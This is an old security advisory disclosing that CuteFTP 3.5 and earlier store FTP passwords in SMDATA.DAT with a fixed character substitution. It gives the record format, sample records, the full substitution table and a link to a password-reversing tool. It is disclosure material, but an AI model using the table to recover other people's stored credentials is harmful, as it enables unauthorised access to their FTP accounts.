Vulnerability in CuteFTP's password storage ------------------------------------------- by black-hand, November 1999 / January 2000 Intro: ------ CuteFTP stores passwords using a simple character substitution, with an encryption table that is easily derived, passwords can be extracted Using this technique an attacker can extract usernames and passwords for stored sites after obtaining the SMDATA.DAT file either locally or remotely using a trojan or other technique Applies to: ----------- CuteFTP 3.5 and earlier versions Discussion: ----------- CuteFTP has an option of storing FTP sites for quick access to sites at a later stage. In a sites record all the sites information including the relevant IP address, username and password. This is all stored in the SMDATA.DAT file which can be found in the CuteFTP directory. The password is stored in this database using a simple ASCII substitution between plaintext and ciphertext. This substitution is the same for all user records. SMDATA.DAT by default is located at: C:\Program Files\CuteFTP\SMDATA.DAT Exploit: -------- Opening up the SMDATA.DAT file in an editor shows every record, and towards the end user records are stored. An example of such records taken from a SMDATA.DAT are: $^À^DTestftp.test.com^Duser^H©ª«^É^Ê^Ëö÷ ^B ^Ý ^U ^B ^?^?^?^?^B ^B ^B ^B ^B ^A ^B $^À^Dtest2www.test.com^Dtest^H¸©»»¿§º¬^Yinnitial remote directory^Qinitial directory comments^B ^Ý ! ç^Cd ×zY^A^B ^B ^B ^B ^B ^Vlocal directory filt er^[ remotee directory filteeeer^A ^B The $ sign signifies a new record, and this is followed by a number of fields which are delimited by a different ASCII character each time (you will need a compatible viewer to see some ASCII characters). The records are stored in this format $^À^DRECORD NAMEIP ADDRESS^DUSERNAME^HENCRYPTED PASSWORD^B ^Ý For instance in the first record, you can read off the first line this information: RECORD NAME = Test IP ADDRESS = ftp.test.com USERNAME = user PASSWORD = ©ª«^É^Ê^Ëö÷ and the rest of the fields are left blank or contain little or no information (this advises that the client should use default values). Note that the port number field is blank as well. So, by enciphering a known plaintest and analysing it, the means of enciphermen t can be easily deduced. The above example shows the password abcABC>? enciphered, the result in the records database is ©ª«^É^Ê^Ëö÷ . From this you can deduce that a=© b=ª and so forth (note that it is case-sensitive) Therefore, when enciphering the following string: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()`~-=\[] ';,./_+|{}:"<>? we get: ^É^Ê^Ë^Ì^Í^Î^Ï^À^Á^Â^Ã^Ä^Å^Æ^Ç^Ø^Ù^Ú^Û^Ü^Ý^Þ^ß^Ð^Ñ^Ò©ª«¬®¯ ¡¢£¤¥¦§¸¹º»¼½¾¿°±²ùú ûüýþ^?ðñøé^Èëìí^Öîâàᨶåõ^Ô^Ó^Õïóäæç^×ã´³µòêôö÷ it's trivial to reverse the values from the SMDATA.DAT file and deduce the user's password. If an intruder has network or physical access to the SMDATA.DAT file in your CuteFTP directory, then your passwords are compromised. The intruder will be able to extract all necasssery information from the SMDATA.DAT to break into your account. The SMDATA.DAT file is typicaly ~17k in size, depending on the number of entries. Program to Exploit: ------------------- A VB-based application is available to reverse CuteFTP derived ciphertext passwords. The TABLE.DAT file included consists of a single 188 character line of information, consisting of firstly the plaintext characters followed by the ciphertext. A simple substitution is mode from one fo the other. To use, open up SMDATA.DAT file, and copy the password information and paste it into the program to reveal the password. The encrypted passwords can be found between the ^H and ^B characters (ASCII values 8 and 2 respectively). The result is placed into TABLE.DAT (open it with a text exitor) The exploit (zipped) is downloadable at: http://www.2600.org.au/advisories/cuteftp-1199.zip An example of a SMDATA.DAT file can be downloaded at http://www.2600.org.au/advisories/smdata.dat Note: ----- There are several older "CuteFTP Password Crackers" available from various internet sites. Given that source is not available for these and the fact that they make specific reference to "version 1.6/1.8", it is not known if this is the same exploit. Contact: -------- I can be contacteed on black_hand@2600.org.au homepage at http://asio.wiretapped.net/~apis -black-hand